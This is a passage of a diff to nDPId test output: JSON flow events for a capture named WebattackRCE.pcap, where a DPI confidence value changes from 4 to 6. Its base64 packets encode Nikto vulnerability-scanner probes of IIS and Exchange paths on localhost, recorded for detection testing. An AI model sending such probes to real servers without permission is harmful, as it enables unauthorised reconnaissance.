Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276768,"pkt":"AAAAAAAAAAAAAAAACABFAAC2dlNAAEAGxex\/AAABfwAAAcIQH5C4PE56dk2whIAYAED+qgAAAQEICp1m+0idZvtIR0VUIC8gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420276770,"pkt":"AAAAAAAAAAAAAAAACABFAAC8XLtAAEAG335\/AAABfwAAAcISH5CeUGSSsmiGvoAYAED+sAAAAQEICp1m+0qdZvtKR0VUIC9pbWFnZXMgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420276771,"pkt":"AAAAAAAAAAAAAAAACABFAADTCw5AAEAGMRV\/AAABfwAAAcIUH5CyKDMlKN\/VCYAYAED+xwAAAQEICp1m+0udZvtLR0VUIC9BdXRvZGlzY292ZXIvQXV0b2Rpc2NvdmVyLnhtbCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276773,"pkt":"AAAAAAAAAAAAAAAACABFAADDAPJAAEAGO0F\/AAABfwAAAcIWH5B1lTjaOiDdGIAYAED+twAAAQEICp1m+02dZvtMR0VUIC9BdXRvZGlzY292ZXIvIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276774,"pkt":"AAAAAAAAAAAAAAAACABFAADRNpRAAEAGBZF\/AAABfwAAAcIYH5C\/CA68jFESSoAYAED+xQAAAQEICp1m+06dZvtOR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276776,"pkt":"AAAAAAAAAAAAAAAACABFAADdUNZAAEAG60J\/AAABfwAAAcIaH5Ae8Gj\/tlcbuIAYAED+0QAAAQEICp1m+1CdZvtPR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5jc3MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276777,"pkt":"AAAAAAAAAAAAAAAACABFAAC51DJAAEAGaAp\/AAABfwAAAcIcH5BDaOwb++ns54AYAED+rQAAAQEICp1m+1GdZvtRR0VUIC9FQ1AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276779,"pkt":"AAAAAAAAAAAAAAAACABFAAC5SehAAEAG8lR\/AAABfwAAAcIeH5AlzXHNG7GlzoAYAED+rQAAAQEICp1m+1OdZvtTR0VUIC9FV1MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276780,"pkt":"AAAAAAAAAAAAAAAACABFAADH3u5AAEAGXUB\/AAABfwAAAcIgH5D8fubIriLokYAYAED+uwAAAQEICp1m+1SdZvtUR0VUIC9FV1MvRXhjaGFuZ2UuYXNteCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 